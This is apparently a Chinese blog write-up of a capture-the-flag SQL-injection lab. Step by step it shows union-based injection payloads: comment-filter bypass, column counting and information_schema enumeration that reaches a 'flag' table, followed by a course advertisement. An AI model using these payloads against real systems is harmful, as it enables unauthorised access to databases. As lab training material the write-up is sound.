春秋云境28512(2)

于 2024-05-15 18:32:46 发布
阅读量320 收藏 8
点赞数 3
分类专栏: 程序员 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968582/article/details/138918871
版权

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1

分析一下就知道就是一个 ’ 并且过滤符#被过滤了

bf0cbdeb3ad24be599f9df7fccea3238.png

所以用  --+  或者 ;%00 来过滤后面

da0c3b2f0e574a3d9168b499df737584.png

用 order by 数字  来判断字段发现order by 9成功

b035043209af419cb060d83f56c6aade.png

order by 10报错,所以字段就是9个a8de5edd91f049a88b4d0d63b8ef5681.png

使用payload:?id=-1’ union select 1,2,3,4,5,6,7,8,9 ;%00

发现第2个位置有回显6deba45b93804d7bb79cdab58cfc893b.png

?id=-1’ union select 1,database(),3,4,5,6,7,8,9 ;%00

爆出数据库ctf

64150abe86bd4115b6500e4ce1dffae8.png

试了很多写法最后还是发现payload为:?id=-1’ union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables where table_schema=‘ctf’;%00

爆出表名titles6cd2a64e1261427caf4bf52b4fed209f.png

?id=-1’ union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=‘titles’;%00

接着爆字段,发现爆出来的东西没一点关系(表爆出了一个没用的)

fa34ba0a2c2a4adf9e6231de167b069c.png

构造payload

?id=-1’ union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()limit 10,1 --+

查看后面的表名

从limit 0,1 一直到limit 13,1

一共有14个表

分别为titlespage_hitsmembership_userpermissionsmembership_groupsblog_categoriesmembership_userrecordsmembership_userseditors_choiceblogslinksflagbanner_postsmembership_grouppermissionsvisitor_info

毫无疑问就flag最像了

1fe5e531bc5c465aa064e2fd0366f796.png

接着便是查字段
?id=-1’ union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=‘flag’ --+

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

!!**](https://bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968582
关注
专栏目录
Windows Server2019安全基线等保参考要求
weixin_52364868的博客
04-27 1694
Windows Server的基线安全(等保要求) 检查项类别 名称 方式 检查项预期 是否达标 加固建议 文档 IP协议 防火墙TCP/IP筛选配置 手动 业务所需的TCP,UDP端口和IP协议是否开放 0 开放业务所需的TCP,UDP端口和I
春秋云境—Initial
龙狼刺的博客
07-15 2000
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
AAA-------网安的一种管理机制--认证授权计费
2401_84970893的博客
05-12 457
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
MySQL第05章_排序与分页
LeungKiChen
11-23 538
MySQL第05章_排序与分页 #第05章_排序与分页 #1. 排序 # 如果没有使用排序操作,默认情况下查询返回的数据是按照添加数据的顺序显示的。 SELECT * FROM employees; # 1.1 基本使用 # 使用 ORDER BY 对查询到的数据进行排序操作。 # 升序:ASC (ascend) # 降序:DESC (descend) # 练习:按照salary从高到低的顺序显示员工信息 SELECT employee_id,last_name,salary FROM emp.
MySQL order by关键字详解,order by排序
热门推荐
libaiup的博客
11-24 1万+
关键字一、order by 简介1)order by 的作用2)语法格式二、order by 使用1)按照字段名排序2)按照索引进行排序3)降序4)按照多列排序一、order by 简介ORDER BY 关键字用于对结果集进行「排序」。1)order by 的作用ORDER BY 关键字可以使查
Java字节码插桩玩法(Javassist)
Alan0517
11-28 2284
Javassit介绍 Javassit是一个开源的分析,编辑,和创建Java字节码的类库,其主要优点在于简单,而且快速,直接使用java编码的形式,而不需要了解java虚拟机指令,就能动态改变类结构,或者动态生成 注: 也可以使用ASM实现,但是需要学会操作字节码指令,学习成本高 运行时.jar javaagent.jar 入口方法 main(String[]) premain(String,instrumcent) 参数 main-class premain-class 运行 j
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云境.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 1074
春秋云境.com】CVE-2022-32991思路
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...
春秋云境 任意文件上传
09-09
春秋云境是一个虚构的概念,可能在上下文中用于描述一个虚拟环境或者某种技术。根据所提供的引用内容,引用提到了一个叫做"WBCE CMS v1.5.2"的软件存在文件上传漏洞,攻击者可以利用这个漏洞进行远程命令执行(RCE)...
mysql order by 排序_MySQL中order by 排序必知
weixin_31281003的博客
01-18 831
在开发过程时,我们经常会遇到 order by排序操作,那么你知道什么时候MySQL才会进行排序操作,什么时候不需要时间排序操作?,下面我们就从一个很小的例子中了解一下排序场景。表结构如下:CREATE TABLE t (id int(11) unsigned NOT NULL AUTO_INCREMENT,city varchar(16) NOT NULL,name varchar(16) N...
nmap
weixin_33836223的博客
07-31 96
目标规范: 可以通过主机名, IP地址,网络等 例:scanme.nmap.org, dream4.org/24, 192.168.0.1; 10.0.0-255.1-254 -iL <inputfilename>: 从指定文件获取主机或网络 -iR <num hosts>: 随机选择主机,(0 不限制扫描主机数) --exclude &lt...
Java Filter 型内存马调试系列 (三)——一种Tomcat全版本获取StandardContext的新方法(全网首次发布,精调无错版)_standardcontext获取
2401_84968582的博客
05-12 332
# 最后**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。****深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!****因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**!!!!!
java插桩-javaassist
关注网络安全、云原生安全
08-24 3484
简介 Javassist (JAVA programming Assistant,Java编程助手) 是一个用Java编辑字节码的类库。它使Java程序可以在运行时定义新类,并在JVM加载它时修改类文件。 与其他类似的字节码编辑器不同,Javassist提供两个级别的API:源代码级别和字节码级别。 如果使用源代码级API,则可以在不了解Java字节码规范的情况下编辑类文件。整个API仅使用Java语言的词汇表进行设计。甚至可以以源文本的形式指定插入的字节码。Javassist可以即时对其进行编译。
golang 两个一样的字符串不相等_那些神一样的软件测试员,总会那么一两个你不知道的测试技术…...
weixin_32251071的博客
12-25 524
插桩技术指在保证原有程序逻辑完整性的基础上,在程序中插入探针,通过探针采集代码中的信息(方法本身、方法参数值、返回值等)在特定的位置插入代码段,从而收集程序运行时的动态上下文信息。一、"插桩"式技术实现原理"插桩"式实现通过两个阶段,动态HooK和污点传播。(一)动态HooK阶段技术原理动态Hook阶段,越靠近底层,拿到的应用数据越详尽,数据量也越大,技术难度也越高;以Java为例,最常见的Hoo...
【渗透测试笔记】之【拒绝服务攻击】_拒绝服务攻击的代码(1)
最新发布
2401_84971562的博客
05-13 403
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
基于 JavaAgent 代理技术实现 class 字节码插桩(bytebuddy)
小单的博客专栏
03-08 980
先描述一个场景,生产有一个正在运行的java项目,以某 springboot-service.jar 为例,项目发布后发现了某个http接口响应较慢,此时你希望定位这个http接口执行过程中依次调用的几个主要方法的分别执行耗时,用来作为进一步解决问题的依据。你应该怎么做?Java Agent 技术常被用于加载class文件之前进行拦截并修改字节码,以实现对Java应用的无侵入式增强。
MySQL - ORDER BY 详解
老班长的博客
09-03 216
1 概述 MySQL有两种方式可以实现ORDER BY: 1.通过索引扫描生成有序的结果 2.使用文件排序(filesort) 围绕着这两种排序方式,我们试着理解一下ORDER BY的执行过程以及回答一些常见的问题(下文仅讨论InnoDB存储引擎)。 2 索引扫描排序和文件排序(filesort)简介 我们知道InnoDB存储引擎以B+树作为索引的底层实现,B+树的叶子节点存储着所有数...
03-构建xss漏洞环境(1)
2401_84968222的博客
05-11 436
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值